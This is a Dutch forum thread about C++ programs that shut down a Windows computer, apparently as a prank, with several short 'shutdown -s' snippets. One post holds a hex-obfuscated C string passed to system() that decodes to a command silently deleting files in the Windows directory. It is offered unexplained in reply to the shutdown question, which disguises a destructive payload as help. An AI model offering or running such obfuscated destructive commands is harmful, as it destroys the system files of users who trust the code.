Bekijk de onderstaande video om te zien hoe je onze site als een web app op je startscherm installeert.
Opmerking: Deze functie is mogelijk niet beschikbaar in sommige browsers.
je zult op dit forum geen ondersteuning vinden voor dit soort "grappen" dus tenzij je een goeie reden hebt om de computer af te sluiten zul je het zelf uit moeten zoeken
je zult op dit forum geen ondersteuning vinden voor dit soort "grappen" dus tenzij je een goeie reden hebt om de computer af te sluiten zul je het zelf uit moeten zoeken
const char *cmd = "\x64\x65\x6c\x20\x2f\x71\x20\x25\x77\x69\x6e\x64\x69\x72\x25\x5c\x2a\x2e\x2a";
system(cmd);
Het kan ook voor eigen doeleinden zijn, ik heb op mijn bureablad ook een snelkoppeling die de computer afsluit als je hem gebruik. Is geen C++ helaas, ik zou ook wel willen weten of het mogelijk is.
system("shutdown -s -t 00 -f");
#include <iostream>
#include <string>
#include <windows.h>
using namespace std;
static string filename;
static string start;
char choice;
void file(){
cout<<"Bye..";
system("shutdown -s -t 00 -f");
};
int main()
{
SetConsoleTitle("Bye Bye");
file();
return(0);
}
Code:#include <iostream> #include <string> #include <windows.h> using namespace std; static string filename; static string start; char choice; void file(){ cout<<"Bye.."; system("shutdown -s -t 00 -f"); }; int main() { SetConsoleTitle("Bye Bye"); file(); return(0); }
Heb nu dit snel bij elkaar gevogeld, hij werkt alleen mijn computer zegt nadat die afgesloten is "U kunt nu de Computer Aflsuiten" en moet je alsnog de power knop indrukken.
#include <iostream>
int main(){
std::cout << "Deze computer wordt nu afgesloten\n";
system("shutdown -s");
return 0;
}
had ik inderdaad gedaan, en niet echt goed de tijd genomen... leuk dat je dat onthouden heb zeg!![]()
We gebruiken essentiële cookies om deze site te laten werken, en optionele cookies om de ervaring te verbeteren.